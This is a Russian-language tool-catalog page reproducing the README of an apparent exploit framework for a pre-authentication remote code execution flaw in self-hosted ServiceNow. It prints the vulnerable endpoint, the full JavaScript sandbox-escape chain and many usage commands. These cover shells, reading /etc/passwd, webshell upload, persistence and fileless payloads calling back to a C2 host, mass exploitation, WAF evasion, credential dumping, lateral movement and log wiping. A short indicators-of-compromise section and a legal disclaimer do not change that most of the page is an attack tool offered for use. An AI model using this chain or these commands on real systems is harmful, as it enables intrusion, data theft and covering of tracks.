Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-6875-PoC-Exploit — CVE-2026-6875 ServiceNow Pre-Auth RCE Framework 🔥 JS-инъекция → обход песочницы → RCE → root. Функции: --detect, --exec, обратный/интерактивный шелл, многопоточный пакетный режим, обход WAF, закрепление, горизонтальное перемещение, дамп учётных данных, бесфайловое выполнение, очистка следов. 🛡️ CVSS 9.5, активно эксплуатируется. Только авторизованное и легальное использование. Оставайтесь в рамках закона. 🔒 | Kitploit
Инструменты/GitHubGitHub/tc4dy/cve-2026-6875-poc-exploit
Повышение привилегийСканеры уязвимостейМеханизмы персистентностиЭксплуатацияЛатеральное перемещениеЭксплуатация веб-приложенийПост-эксплуатацияОбход WAFТестирование на Проникновение

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2026-6875 ServiceNow Pre-Auth RCE Framework 🔥 JS-инъекция → обход песочницы → RCE → root. Функции: --detect, --exec, обратный/интерактивный шелл, многопоточный пакетный режим, обход WAF, закрепление, горизонтальное перемещение, дамп учётных данных, бесфайловое выполнение, очистка следов. 🛡️ CVSS 9.5, активно эксплуатируется. Только авторизованное и легальное использование. Оставайтесь в рамках закона. 🔒

Инструмент Удаленного Доступа
GitHubtc4dy/cve-2026-6875-poc-exploit

CVE-2026-6875-PoC-Exploit

Репозиторий
329 дней назадЕщё не проверено
Поделиться

CVE-2026-6875

CVE-2026-6875 — Эксплойт-фреймворк и верификатор PoC для Pre-Auth RCE в ServiceNow 🔥

CVE-2026-6875 CVSS 9.5 CISA KEV Python 3.6+

Pre-Auth RCE Sandbox Escape Privesc Windows Ready

Платформа ServiceNow AI — внедрение JavaScript → обход песочницы → RCE → повышение привилегий до root

Эксплойт-фреймворк и безопасный верификатор
Только для авторизованного тестирования безопасности.


⚖️ Правовой дисклеймер и ответственное использование

Этот инструмент предоставляется исключительно в образовательных целях и для авторизованного тестирования на проникновение.

Авторы и участники не несут ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением. Пользователи несут единоличную ответственность за получение явного письменного разрешения от владельца цели перед тестированием. Несанкционированный доступ к компьютерным системам является незаконным согласно Закону о компьютерном мошенничестве и злоупотреблениях (CFAA) и аналогичным законам по всему миру.

Используя данное программное обеспечение, вы соглашаетесь:

  • Использовать его только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение.
  • Соблюдать все применимые местные, государственные и федеральные законы.
  • Не использовать его для любых вредоносных, разрушительных или противоправных действий.

⚠️ ПРЕДУПРЕЖДЕНИЕ: Эта уязвимость активно эксплуатируется в дикой природе. Несанкционированное использование может привести к серьёзным правовым последствиям.


🔥 Обзор уязвимости

CVE-2026-6875 — это критическая уязвимость неаутентифицированного удалённого выполнения кода (RCE) в платформе ServiceNow AI (ранее Now Platform). Она позволяет злоумышленникам обойти песочницу сценариев и выполнять произвольные системные команды с привилегиями приложения ServiceNow.

Как это работает:

  1. Внедрение JavaScript: конечная точка assessment_thanks.do принимает параметр sysparm_assessable_type. Добавляя к значению префикс javascript:, злоумышленник внедряет произвольный JavaScript-код.

  2. Обход песочницы: изощрённый гаджет обхода песочницы (объединяющий DiscoveryFunctions.getCacheObjectForTable, AbstractAjaxProcessor и Class.create) снимает ограничения JavaScript-песочницы.

  3. Удалённое выполнение кода: внедрённый Java-код (через java.lang.Runtime.exec()) выполняется с привилегиями приложения ServiceNow, что обеспечивает полную компрометацию системы.

  4. Повышение привилегий: модули постэксплуатации пытаются повысить привилегии до root через неправильные конфигурации sudo, SUID-бинарии, доступные для записи задания cron или эксплойты ядра.

Ключевые факты:


🛠️ Эксплойт-фреймворк (exploit.py)

Полнофункциональный боевой эксплойт объединяет внедрение JavaScript и обход песочницы для достижения удалённого выполнения кода, с расширенными модулями постэксплуатации для закрепления, горизонтального перемещения и извлечения учётных данных.

✨ Возможности

Команды интерактивной оболочки


🕵️ Безопасный верификатор (verifier.py)

Безопасный верификатор выполняет ненавязчивое обнаружение уязвимости без выполнения вредоносных полезных нагрузок и без внесения изменений в систему.

✨ Возможности


📦 Установка и требования

Предварительные требования

  • Python 3.6+
  • pip (для библиотеки requests)

Установка зависимостей

root@kitploit:~
pip install requests urllib3

[!NOTE] exploit.py использует только стандартную библиотеку для основной функциональности; requests требуется лишь для функции --detect, --webhook-уведомлений и безопасного верификатора.


🚀 Примеры использования

[1] Безопасный верификатор (verifier.py)

root@kitploit:~
# Single target verification
python verifier.py -u 192.168.1.100

# Custom port and path
python verifier.py -u 10.0.0.5 -p 8443 --path /snow

# Mass scan from file
python verifier.py -l targets.txt -o results.json

# Quiet mode (only vulnerable targets)
python verifier.py -u 192.168.1.100 -q

# Increase timeout for slow targets
python verifier.py -u servicenow.example.com --timeout 60

# Custom User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"

[2] Эксплойт-фреймворк (exploit.py)

root@kitploit:~
# Interactive shell on target
python exploit.py -u 192.168.1.100

# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"

# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd

# Enable detection before exploitation
python exploit.py -u 192.168.1.100 --detect

# Attempt root privilege escalation
python exploit.py -u 192.168.1.100 --privesc

# Upload a webshell
python exploit.py -u 192.168.1.100 --upload shell.jsp

# Install persistence with C2
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444

# Clean tracks after exploit
python exploit.py -u 192.168.1.100 --clean

# Use fileless (memory) payload
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444

# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"

# Custom callback server port
python exploit.py -u 192.168.1.100 --callback-port 9090

# Enable WAF bypass techniques
python exploit.py -u 192.168.1.100 --waf-bypass

# Send notifications via webhook
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow

# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100

# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /snow

# Disable TLS verification (for self-signed certs)
python exploit.py -u 192.168.1.100 --insecure-tls

# Custom timeout and retries
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0

🎯 Затронутые версии

⚠️ Важно: облачные экземпляры ServiceNow автоматически получают исправления. Эта уязвимость в первую очередь затрагивает самостоятельно размещаемые развёртывания.


🧠 Технический разбор

1. Внедрение JavaScript (CVE-2026-6875)

Уязвимость находится в конечной точке assessment_thanks.do, которая принимает параметр sysparm_assessable_type. При передаче значения, начинающегося с javascript:, платформа выполняет последующий JavaScript в контексте системы.

Уязвимая конечная точка:

POST /assessment_thanks.do sysparm_assessable_type=javascript:gs.print('test')

2. Гаджет обхода песочницы

Внедрённый код изначально ограничен песочницей. Однако, эксплуатируя следующую цепочку:

root@kitploit:~
javascript:
var s="<payload>";
DiscoveryFunctions.getCacheObjectForTable=Object;
var a={};a.get=Object;
var b=new AbstractAjaxProcessor();
b.initialize=DiscoveryFunctions.getFirstValueFromTable(
  a,"",DiscoveryFunctions.getFirstValueFromTable(
    a,"",DiscoveryFunctions.getFirstValueFromTable(
      a,"",global,"WorkflowIconsSCR",""),"prototype",""),"initialize","");
b.a=Class.create();b.a(s);

Песочница обходится, предоставляя полный доступ к Java-классам, таким как java.lang.Runtime.

3. Модули постэксплуатации

Извлечение учётных данных

Ищет пароли, API-ключи и секреты в файлах .properties, .xml, .conf:

  • /opt/ServiceNow/conf/*.xml
  • /var/log/ServiceNow/*.log
  • /etc/passwd, /etc/shadow

Закрепление

Устанавливает бэкдоры через:

  • Linux: задания cron (*/5 * * * *), службы systemd, SSH-ключи
  • Windows: запланированные задачи (schtasks), ключи автозапуска в реестре

Горизонтальное перемещение

Сканирует локальную подсеть на предмет других экземпляров ServiceNow или SSH-хостов, повторно использует обнаруженные учётные данные.

Безфайловое выполнение

Компилирует Java-класс на лету, загружает его через ClassLoader и выполняет в памяти (без записи на диск).

Методы обхода WAF

  1. Двойное URL-кодирование
  2. JavaScript-комментарии ({/*comment*/})
  3. Unicode-экранирование (\u0077 для w)
  4. Внедрение пробелов
  5. Разбиение ключевых слов (ne\u0077 для new)
  6. Случайный выбор метода

🔍 Индикаторы компрометации (IoCs)

Анализ журналов

Проверьте журналы ServiceNow на наличие:

  • extraweb_access.log — запросы к /assessment_thanks.do с sysparm_assessable_type, содержащим:
    • javascript:
    • строки в base64-кодировке
    • DiscoveryFunctions.getCacheObjectForTable
    • AbstractAjaxProcessor

Файловая система

  • Неожиданные файлы в /var/tmp/ (например, shell.jsp, .sh-сценарии)
  • Изменённые /etc/passwd, /etc/shadow или ~/.ssh/authorized_keys
  • Новые задания cron (crontab -l)
  • Новые службы systemd (/etc/systemd/system/)

Процессы

  • Подозрительные процессы (/bin/bash -i, nc, curl, wget, python -c)
  • Неожиданные сетевые подключения к внешним IP-адресам

Сеть

  • Исходящие подключения от сервера ServiceNow к неавторизованным IP-адресам
  • Подключения reverse shell на необычных портах

📚 Ссылки

  • NVD - CVE-2026-6875
  • ServiceNow Security Advisory (KB3137947)
  • CISA KEV Catalog
  • Searchlight Cyber – Technical Write‑up
  • The Hacker News – ServiceNow Zero‑Day Exploited

🔗 Другие эксплойты

[+] CVE-2026-15409/15410 - SonicWall SMA1000 Multi-Exploit Framework
https://github.com/tc4dy/CVE-2026-15409-15410-Framework

[+] CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit

[+] CVE-2026-57821 - Apache Fineract SQL Injection Toolkit
https://github.com/tc4dy/CVE-2026-57821-PoC-Exploit

[+] CVE-2026-41940 - cPanel/WHM Authentication Bypass
https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit

Скачать инструмент
АтрибутЗначение
📅 Обнаружена1 апреля 2026 года (Searchlight Cyber)
⚠️ Оценка CVSS9.5 (КРИТИЧЕСКАЯ)
📋 CISA KEVДобавлена 13 июля 2026 года
🎯 Затронутые продуктыСамостоятельно размещаемая платформа ServiceNow AI
🔄 Исправленные версииBrazil EA/GA, Australia Patch 2, Zurich Patch 7b/9, Yokohama Patch 12 Hot Fix 1b/13
🔓 АутентификацияНе требуется (Pre-Auth)
🌍 Активная эксплуатацияПодтверждена в дикой природе (июль 2026 года)
ВозможностьОписание
🚀 Внедрение JavaScriptВнедряет полезную нагрузку через параметр sysparm_assessable_type.
💻 Обход песочницыОбходит песочницу сценариев ServiceNow для запуска произвольного Java-кода.
🔐 Интерактивная оболочкаЗапуск живой оболочки с поддержкой множества команд.
👑 Повышение привилегий до rootПроверяет неправильные конфигурации sudo, SUID-бинарии и задания cron.
📁 Операции с файламиЗагрузка веб-шеллов, чтение/скачивание файлов через base64-кодирование.
🌐 Пакетное сканированиеМассовая эксплуатация нескольких целей с использованием потоков (флаг -l).
🎯 Безопасное обнаружениеОпциональный флаг --detect для ненавязчивой проверки уязвимости.
⚙️ Обход WAFВстроенные методы обфускации для обхода WAF/IDS (6 методов).
🧩 ЗакреплениеУстанавливает бэкдоры cron/systemd/schtasks.
🔍 Горизонтальное перемещениеСканирует локальную сеть на предмет других уязвимых хостов и пытается распространяться через SSH/SSRF.
🧹 Очистка следовУдаляет журналы, историю bash и журналы аудита.
💾 Безфайловое выполнениеИспользует Java ClassLoader для запуска резидентных в памяти полезных нагрузок без записи на диск.
🔌 Callback-серверВстроенный HTTP-сервер для получения вывода команд (опционально).
📢 Webhook-уведомленияОтправляет результаты на произвольный URL (Slack, Discord и т.д.).
🪟 КроссплатформенностьПоддерживает цели Linux и Windows (cmd.exe / PowerShell).
🔒 ПотокобезопасностьИспользует механизмы блокировки для конкурентных операций.
📊 Определение версииОпределяет версию ServiceNow (Zurich/Brazil/Australia/Yokohama).
КомандаОписание
exec <cmd>Выполнить системную команду
upload <local> [remote]Загрузить веб-шелл на цель
download <remote>Скачать и отобразить содержимое файла
privescПопытка повышения привилегий
reverse <host> <port>Отправить обратную оболочку (reverse shell)
dumpcredИзвлечь учётные данные из конфигураций ServiceNow
persist <host> <port>Установить закрепление (cron/systemd/schtasks)
lateralПопытка горизонтального перемещения
cleanОчистить следы (журналы, историю)
memory <host> <port>Выполнить безфайловую Java-полезную нагрузку
exitВыйти из интерактивной оболочки
ВозможностьОписание
🔍 Обнаружение ServiceNowОпределяет экземпляры ServiceNow через несколько конечных точек.
📊 Определение версииОпределяет конкретные релизы ServiceNow и уровни патчей.
🧪 Тест на внедрение JavaScriptПроверяет уязвимость внедрения с помощью безопасных полезных нагрузок gs.print().
🔒 Тест на обход песочницыПроверяет обход песочницы без разрушительных команд.
📈 Оценка уверенностиПредоставляет процент уверенности (85–95 %) на основе доказательств.
📋 Вывод в JSONЭкспорт результатов в формат JSON для отчётности.
🔄 Массовое сканированиеСканирование нескольких целей с поддержкой потоков.
🎯 НенавязчивостьВыполняет только безвредную команду uname -a для получения информации о системе.
Релиз ServiceNowУязвимые версииИсправленные версии
BrazilEA, GAИсправлено (после GA)
AustraliaДо Patch 2Patch 2+
ZurichДо Patch 7b, Patch 9Patch 7b, Patch 9+
YokohamaДо Patch 12 Hot Fix 1bPatch 12 Hot Fix 1b, Patch 13
Другие релизыНеизвестноСм. официальный бюллетень